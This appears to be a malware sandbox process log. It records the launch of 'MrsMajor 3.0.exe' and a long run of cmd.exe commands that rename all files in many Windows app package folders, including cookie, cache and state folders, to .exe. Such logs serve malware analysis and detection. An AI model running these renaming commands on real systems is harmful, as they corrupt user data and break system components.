"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows_ie_ac_001\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
"C:\Users\Admin\Downloads\MrsMajor 3.0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\*.*" "*.exe"
C:\Windows\System32\cmd.exe
